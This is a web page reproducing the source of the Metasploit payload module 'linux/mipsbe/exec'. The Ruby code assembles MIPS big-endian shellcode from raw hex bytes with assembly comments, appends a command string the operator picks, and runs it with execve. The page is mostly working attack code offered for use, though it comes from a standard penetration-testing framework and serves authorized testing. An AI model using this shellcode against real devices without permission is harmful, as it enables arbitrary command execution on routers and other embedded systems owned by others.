Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/payloads/singles/linux/mipsbe/exec.rb
Views: 11781
# -*- coding: binary -*-12##3# This module requires Metasploit: https://metasploit.com/download4# Current source: https://github.com/rapid7/metasploit-framework5##67module MetasploitModule89CachedSize = 521011include Msf::Payload::Single12include Msf::Payload::Linux1314def initialize(info = {})15super(merge_info(info,16'Name' => 'Linux Execute Command',17'Description' => %q{18A very small shellcode for executing commands.19This module is sometimes helpful for testing purposes.20},21'Author' =>22[23'Michael Messner <devnull[at]s3cur1ty.de>', #metasploit payload24'[email protected]' #original payload25],26'References' =>27[28['EDB', '17940']29],30'License' => MSF_LICENSE,31'Platform' => 'linux',32'Arch' => ARCH_MIPSBE,33'Payload' =>34{35'Offsets' => {} ,36'Payload' => ''37})38)39register_options(40[41OptString.new('CMD', [ true, "The command string to execute" ]),42])43end4445#46# Returns the command string to use for execution47#48def command_string49return datastore['CMD'] || ''50end5152def generate(_opts = {})5354shellcode =55"\x24\x06\x06\x66" + #li a2,163856"\x04\xd0\xff\xff" + #bltzal a2,4100b457"\x28\x06\xff\xff" + #slti a2,zero,-158"\x27\xbd\xff\xe0" + #addiu sp,sp,-3259"\x27\xe4\x10\x01" + #addiu a0,ra,409760"\x24\x84\xf0\x1f" + #addiu a0,a0,-406561"\xaf\xa4\xff\xe8" + #sw a0,-24(sp)62"\xaf\xa0\xff\xec" + #sw zero,-20(sp)63"\x27\xa5\xff\xe8" + #addiu a1,sp,-2464"\x24\x02\x0f\xab" + #li v0,401165"\x01\x01\x01\x0c" #syscall 0x404046667#68# Constructs the payload69#7071shellcode = shellcode + command_string + "\x00"7273# we need to align our shellcode to 4 bytes74while shellcode.bytesize%4 != 075shellcode = shellcode + "\x00"76end7778return super + shellcode7980end81end828384